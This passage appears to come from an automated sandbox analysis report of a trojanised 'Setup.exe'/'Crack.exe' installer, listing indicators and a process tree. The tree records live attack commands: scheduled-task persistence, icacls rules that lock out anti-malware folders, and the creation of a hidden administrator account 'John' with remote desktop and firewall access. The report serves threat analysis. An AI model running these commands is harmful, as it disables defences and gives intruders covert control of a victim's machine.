Token: SeDebugPrivilege	4600	winserv.exe
Token: SeTakeOwnershipPrivilege	5172	winserv.exe
Token: SeTcbPrivilege	5172	winserv.exe
Token: SeTcbPrivilege	5172	winserv.exe
Token: SeDebugPrivilege	5348	RDPWinst.exe
Token: SeAuditPrivilege	5372	svchost.exe

Suspicious use of FindShellTrayWindow 4 IoCs

Processes:

firefox.exe

pid	Process
2940	firefox.exe
2940	firefox.exe
2940	firefox.exe
2940	firefox.exe

Suspicious use of SendNotifyMessage 3 IoCs

Processes:

firefox.exe

pid	Process
2940	firefox.exe
2940	firefox.exe
2940	firefox.exe

Suspicious use of SetWindowsHookEx 24 IoCs

Processes:

firefox.exeCrack.exeupdate.exewin.exesvchost.exeIP.exesmss.exewinserv.exewinserv.exeRDPWinst.exewinserv.exe

pid	Process
2940	firefox.exe
2940	firefox.exe
2940	firefox.exe
2940	firefox.exe
6576	Crack.exe
6624	update.exe
5132	win.exe
7136	svchost.exe
5676	IP.exe
5484	smss.exe
4600	winserv.exe
4600	winserv.exe
4600	winserv.exe
4600	winserv.exe
4600	winserv.exe
5172	winserv.exe
5172	winserv.exe
5172	winserv.exe
5172	winserv.exe
5348	RDPWinst.exe
6664	winserv.exe
6664	winserv.exe
6664	winserv.exe
6664	winserv.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

firefox.exefirefox.exe

description	pid	Process	procid_target
PID 4956 wrote to memory of 2940	4956	firefox.exe	94
PID 4956 wrote to memory of 2940	4956	firefox.exe	94
PID 4956 wrote to memory of 2940	4956	firefox.exe	94
PID 4956 wrote to memory of 2940	4956	firefox.exe	94
PID 4956 wrote to memory of 2940	4956	firefox.exe	94
PID 4956 wrote to memory of 2940	4956	firefox.exe	94
PID 4956 wrote to memory of 2940	4956	firefox.exe	94
PID 4956 wrote to memory of 2940	4956	firefox.exe	94
PID 4956 wrote to memory of 2940	4956	firefox.exe	94
PID 4956 wrote to memory of 2940	4956	firefox.exe	94
PID 4956 wrote to memory of 2940	4956	firefox.exe	94
PID 2940 wrote to memory of 3908	2940	firefox.exe	95
PID 2940 wrote to memory of 3908	2940	firefox.exe	95
PID 2940 wrote to memory of 5112	2940	firefox.exe	96
PID 2940 wrote to memory of 5112	2940	firefox.exe	96
PID 2940 wrote to memory of 5112	2940	firefox.exe	96
PID 2940 wrote to memory of 5112	2940	firefox.exe	96
PID 2940 wrote to memory of 5112	2940	firefox.exe	96
PID 2940 wrote to memory of 5112	2940	firefox.exe	96
PID 2940 wrote to memory of 5112	2940	firefox.exe	96
PID 2940 wrote to memory of 5112	2940	firefox.exe	96
PID 2940 wrote to memory of 5112	2940	firefox.exe	96
PID 2940 wrote to memory of 5112	2940	firefox.exe	96
PID 2940 wrote to memory of 5112	2940	firefox.exe	96
PID 2940 wrote to memory of 5112	2940	firefox.exe	96
PID 2940 wrote to memory of 5112	2940	firefox.exe	96
PID 2940 wrote to memory of 5112	2940	firefox.exe	96
PID 2940 wrote to memory of 5112	2940	firefox.exe	96
PID 2940 wrote to memory of 5112	2940	firefox.exe	96
PID 2940 wrote to memory of 5112	2940	firefox.exe	96
PID 2940 wrote to memory of 5112	2940	firefox.exe	96
PID 2940 wrote to memory of 5112	2940	firefox.exe	96
PID 2940 wrote to memory of 5112	2940	firefox.exe	96
PID 2940 wrote to memory of 5112	2940	firefox.exe	96
PID 2940 wrote to memory of 5112	2940	firefox.exe	96
PID 2940 wrote to memory of 5112	2940	firefox.exe	96
PID 2940 wrote to memory of 5112	2940	firefox.exe	96
PID 2940 wrote to memory of 5112	2940	firefox.exe	96
PID 2940 wrote to memory of 5112	2940	firefox.exe	96
PID 2940 wrote to memory of 5112	2940	firefox.exe	96
PID 2940 wrote to memory of 5112	2940	firefox.exe	96
PID 2940 wrote to memory of 5112	2940	firefox.exe	96
PID 2940 wrote to memory of 5112	2940	firefox.exe	96
PID 2940 wrote to memory of 5112	2940	firefox.exe	96
PID 2940 wrote to memory of 5112	2940	firefox.exe	96
PID 2940 wrote to memory of 5112	2940	firefox.exe	96
PID 2940 wrote to memory of 5112	2940	firefox.exe	96
PID 2940 wrote to memory of 5112	2940	firefox.exe	96
PID 2940 wrote to memory of 5112	2940	firefox.exe	96
PID 2940 wrote to memory of 5112	2940	firefox.exe	96
PID 2940 wrote to memory of 5112	2940	firefox.exe	96
PID 2940 wrote to memory of 5112	2940	firefox.exe	96
PID 2940 wrote to memory of 5112	2940	firefox.exe	96
PID 2940 wrote to memory of 5112	2940	firefox.exe	96
PID 2940 wrote to memory of 5112	2940	firefox.exe	96
PID 2940 wrote to memory of 5112	2940	firefox.exe	96
PID 2940 wrote to memory of 5112	2940	firefox.exe	96
PID 2940 wrote to memory of 5112	2940	firefox.exe	96
PID 2940 wrote to memory of 5112	2940	firefox.exe	96
PID 2940 wrote to memory of 5112	2940	firefox.exe	96
PID 2940 wrote to memory of 5112	2940	firefox.exe	96
PID 2940 wrote to memory of 3508	2940	firefox.exe	97
PID 2940 wrote to memory of 3508	2940	firefox.exe	97
PID 2940 wrote to memory of 3508	2940	firefox.exe	97

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\AutoIt-Extractor-net40-x64.exe
"C:\Users\Admin\AppData\Local\Temp\AutoIt-Extractor-net40-x64.exe"
1⤵
PID:332

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4956
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - NTFS ADS
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2940
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2940.0.1060112846\1864619824" -parentBuildID 20221007134813 -prefsHandle 1884 -prefMapHandle 1876 -prefsLen 20749 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d0a88c22-de31-4b0f-8392-a84f13ab91be} 2940 "\\.\pipe\gecko-crash-server-pipe.2940" 1964 1f6bb8cc758 gpu
    3⤵
    PID:3908
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2940.1.894055126\1692423142" -parentBuildID 20221007134813 -prefsHandle 2352 -prefMapHandle 2340 -prefsLen 20785 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4de3356a-53f3-40e0-a478-5cae6cbdc5c2} 2940 "\\.\pipe\gecko-crash-server-pipe.2940" 2364 1f6bb233558 socket
    3⤵
    - Checks processor information in registry
    PID:5112
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2940.2.1659485514\1669713410" -childID 1 -isForBrowser -prefsHandle 3252 -prefMapHandle 3248 -prefsLen 20888 -prefMapSize 233444 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8018c9e5-9683-455b-9dc3-26d3a40166ff} 2940 "\\.\pipe\gecko-crash-server-pipe.2940" 3264 1f6bf779b58 tab
    3⤵
    PID:3508
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2940.3.1480727224\1854720312" -childID 2 -isForBrowser -prefsHandle 3632 -prefMapHandle 3628 -prefsLen 26066 -prefMapSize 233444 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {db950dac-f7e3-4986-93c4-65beb4bdd642} 2940 "\\.\pipe\gecko-crash-server-pipe.2940" 3644 1f6bde9e858 tab
    3⤵
    PID:3624
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2940.4.1498262898\1898091195" -childID 3 -isForBrowser -prefsHandle 4604 -prefMapHandle 4600 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ed2765ff-6f51-4d63-948b-4f50334da547} 2940 "\\.\pipe\gecko-crash-server-pipe.2940" 4260 1f6c0f8e858 tab
    3⤵
    PID:1708
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2940.5.1851941882\408062777" -childID 4 -isForBrowser -prefsHandle 4320 -prefMapHandle 4980 -prefsLen 26206 -prefMapSize 233444 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8f8f49db-609d-48c2-a8ef-5c6b9efffa4e} 2940 "\\.\pipe\gecko-crash-server-pipe.2940" 2844 1f6be20b858 tab
    3⤵
    PID:4064
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2940.6.912555074\1036222770" -childID 5 -isForBrowser -prefsHandle 5116 -prefMapHandle 5016 -prefsLen 26206 -prefMapSize 233444 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {82c61f07-ecce-468d-8b6e-43c710a91469} 2940 "\\.\pipe\gecko-crash-server-pipe.2940" 4600 1f6be20ca58 tab
    3⤵
    PID:3604
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2940.7.1162921940\1451388421" -childID 6 -isForBrowser -prefsHandle 5344 -prefMapHandle 5348 -prefsLen 26206 -prefMapSize 233444 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5d0c8603-8714-4fde-a336-fb6a9f55ea37} 2940 "\\.\pipe\gecko-crash-server-pipe.2940" 5336 1f6be20cd58 tab
    3⤵
    PID:2164
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2940.8.1202514959\812861856" -childID 7 -isForBrowser -prefsHandle 5784 -prefMapHandle 2788 -prefsLen 26285 -prefMapSize 233444 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7525a20e-121b-4b22-bbe0-bc939e8ee03d} 2940 "\\.\pipe\gecko-crash-server-pipe.2940" 2964 1f6bf8bd858 tab
    3⤵
    PID:5816

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3736 --field-trial-handle=2276,i,11674642242468042059,14711253743544118298,262144 --variations-seed-version /prefetch:8
1⤵
PID:6132

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3532

C:\Users\Admin\Desktop\john\Setup.exe
"C:\Users\Admin\Desktop\john\Setup.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:6292
- C:\Users\Admin\Desktop\john\SoftwareInstall.exe
  C:\Users\Admin\Desktop\john\SoftwareInstall.exe
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  PID:6360
- C:\ProgramData\Setup\install.exe
  C:\ProgramData\Setup\install.exe -pkasoft
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:6428
- - C:\ProgramData\Setup\Crack.exe
    "C:\ProgramData\Setup\Crack.exe"
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    - Modifies Windows Defender notification settings
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetWindowsHookEx
    PID:6576
- - C:\ProgramData\Setup\update.exe
    "C:\ProgramData\Setup\update.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Drops file in Drivers directory
    - Checks BIOS information in registry
    - Checks computer location settings
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    PID:6624
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\ServiceManager" /TR "C:\Programdata\ReaItekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST
      4⤵
      Creates scheduled task(s)
      PID:6732
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\CashClean" /TR "C:\Programdata\ReaItekHD\taskhostw.exe" /SC MINUTE /MO 2 /RL HIGHEST
      4⤵
      Creates scheduled task(s)
      PID:1812
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\MasterData" /TR "C:\Windows\SysWOW64\unsecapp.exe" /SC MINUTE /MO 1 /RL HIGHEST
      4⤵
      Creates scheduled task(s)
      PID:5388
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\WinlogonCheck" /TR "C:\Programdata\ReaItekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST
      4⤵
      Creates scheduled task(s)
      PID:5340
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\OnlogonCheck" /TR "C:\Programdata\ReaItekHD\taskhostw.exe" /SC ONLOGON /RL HIGHEST
      4⤵
      Creates scheduled task(s)
      PID:1572
  - - C:\ProgramData\Microsoft\win.exe
      C:\ProgramData\Microsoft\win.exe -ppidar
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:5132
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\FilesystemY\RecoveryHosts" /TR "C:\ProgramData\Microsoft\MapData\QouW64\FilesystemY.bat" /SC ONLOGON /RL HIGHEST
      4⤵
      Creates scheduled task(s)
      PID:6936
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe " /c " & "icacls "C:\KVRT_Data" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:5272
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
      4⤵
      PID:6988
    - - C:\Windows\system32\icacls.exe
        
        icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:7036
  - - C:\ProgramData\Setup\svchost.exe
      C:\ProgramData\Setup\svchost.exe -ppidar
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:7136
    - - C:\ProgramData\Setup\IP.exe
        
        "C:\ProgramData\Setup\IP.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Adds Run key to start application
        Checks whether UAC is enabled
        Drops file in System32 directory
        Suspicious use of NtSetInformationThreadHideFromDebugger
        NTFS ADS
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:5676
      - C:\Windows\SysWOW64\unsecapp.exe
        
        C:\Windows\SysWOW64\unsecapp.exe
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: GetForegroundWindowSpam
        
        PID:440
    - - C:\ProgramData\Setup\smss.exe
        
        "C:\ProgramData\Setup\smss.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Program Files directory
        Checks processor information in registry
        Modifies registry class
        NTFS ADS
        Suspicious use of SetWindowsHookEx
        
        PID:5484
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winsers" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC MINUTE /MO 1 /RL HIGHEST
        6⤵
        Creates scheduled task(s)
        
        PID:5608
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winser" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC ONLOGON /RL HIGHEST
        6⤵
        Creates scheduled task(s)
        
        PID:6644
      - C:\ProgramData\Windows Tasks Service\winserv.exe
        
        "C:\ProgramData\Windows Tasks Service\winserv.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:4600
        
        C:\ProgramData\Windows Tasks Service\winserv.exe
        
        "C:\ProgramData\Windows Tasks Service\winserv.exe" -second
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:5172
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c net user John 12345 /add
        6⤵
        
        PID:2080
        
        C:\Windows\system32\net.exe
        
        net user John 12345 /add
        7⤵
        
        PID:3048
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user John 12345 /add
        8⤵
        
        PID:456
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c net localgroup "Администраторы" John /add
        6⤵
        
        PID:2760
        
        C:\Windows\system32\net.exe
        
        net localgroup "Администраторы" John /add
        7⤵
        
        PID:4892
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup "Администраторы" John /add
        8⤵
        
        PID:1332
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного рабочего стола" John /add
        6⤵
        
        PID:1804
        
        C:\Windows\system32\net.exe
        
        net localgroup "Пользователи удаленного рабочего стола" John /add
        7⤵
        
        PID:4576
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
        8⤵
        
        PID:5868
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного управления" john /add" John /add
        6⤵
        
        PID:5176
        
        C:\Windows\system32\net.exe
        
        net localgroup "Пользователи удаленного управления" john /add" John /add
        7⤵
        
        PID:4132
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" john /add" John /add
        8⤵
        
        PID:2604
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c net localgroup "Administrators" John /add
        6⤵
        
        PID:5784
        
        C:\Windows\system32\net.exe
        
        net localgroup "Administrators" John /add
        7⤵
        
        PID:4632
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administrators" John /add
        8⤵
        
        PID:5924
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c net localgroup "Administradores" John /add
        6⤵
        
        PID:2356
        
        C:\Windows\system32\net.exe
        
        net localgroup "Administradores" John /add
        7⤵
        
        PID:1764
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administradores" John /add
        8⤵
        
        PID:5884
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c net localgroup "Remote Desktop Users" john /add
        6⤵
        
        PID:4656
        
        C:\Windows\system32\net.exe
        
        net localgroup "Remote Desktop Users" john /add
        7⤵
        
        PID:6096
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup "Remote Desktop Users" john /add
        8⤵
        
        PID:32
      - C:\ProgramData\RDPWinst.exe
        
        C:\ProgramData\RDPWinst.exe -i
        6⤵
        Sets DLL path for service in the registry
        Executes dropped EXE
        Modifies WinLogon
        Drops file in System32 directory
        Drops file in Program Files directory
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:5348
        
        C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        7⤵
        Modifies Windows Firewall
        
        PID:1708
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat
        6⤵
        
        PID:4184
        
        C:\Windows\system32\timeout.exe
        
        timeout 10
        7⤵
        Delays execution with timeout.exe
        
        PID:5560
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:5952
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files (x86)\Microsoft JDX" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:7120
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
      4⤵
      PID:2288
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
        5⤵
        
        PID:4848
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:2296
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:3548
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
      4⤵
      PID:5220
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:548
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:5560
    - - C:\Windows\system32\icacls.exe
        
        icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5116
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
      4⤵
      PID:1844
    - - C:\Windows\system32\icacls.exe
        
        icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:3792
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:4500
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\Fonts\Mysql" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:3520
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
      4⤵
      PID:5196
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:6232
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:4516
    - - C:\Windows\system32\icacls.exe
        
        icacls "c:\program files\Internet Explorer\bin" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:6612
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
      4⤵
      PID:2096
    - - C:\Windows\system32\icacls.exe
        
        icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
        5⤵
        
        PID:6424
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe " /c " & "icacls "C:\Windows\speechstracing" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:3780
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
      4⤵
      PID:6224
    - - C:\Windows\system32\icacls.exe
        
        icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
        5⤵
        
        PID:6616
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe " /c " & "icacls "c:\programdata\Malwarebytes" /deny "%username%":(F)
      4⤵
      PID:6212
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
      4⤵
      PID:6388
    - - C:\Windows\system32\icacls.exe
        
        icacls c:\programdata\Malwarebytes /deny System:(F)
        5⤵
        Modifies file permissions
        
        PID:3400
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe " /c " & "icacls "C:\Programdata\MB3Install" /deny "%username%":(F)
      4⤵
      PID:6340
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
      4⤵
      PID:5088
    - - C:\Windows\system32\icacls.exe
        
        icacls C:\Programdata\MB3Install /deny System:(F)
        5⤵
        
        PID:6592
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe " /c " & "icacls "C:\Programdata\Indus" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:6604
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
      4⤵
      PID:6536
    - - C:\Windows\system32\icacls.exe
        
        icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
        5⤵
        
        PID:4080
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe " /c " & "icacls "C:\AdwCleaner" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:2120
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:6312
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\ByteFence" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4964
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe " /c " & "icacls "C:\KVRT2020_Data" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:3652
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\KVRT2020_Data /deny system:(OI)(CI)(F)
      4⤵
      PID:5716
    - - C:\Windows\system32\icacls.exe
        
        icacls C:\KVRT2020_Data /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5032
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe " /c " & "icacls "C:\FRST" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:5388
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\FRST /deny system:(OI)(CI)(F)
      4⤵
      PID:636
    - - C:\Windows\system32\icacls.exe
        
        icacls C:\FRST /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:6864
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:6896
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files (x86)\360" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5976
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:6196
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\360safe" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:7012
  - - C:\Windows\system32\cmd.exe
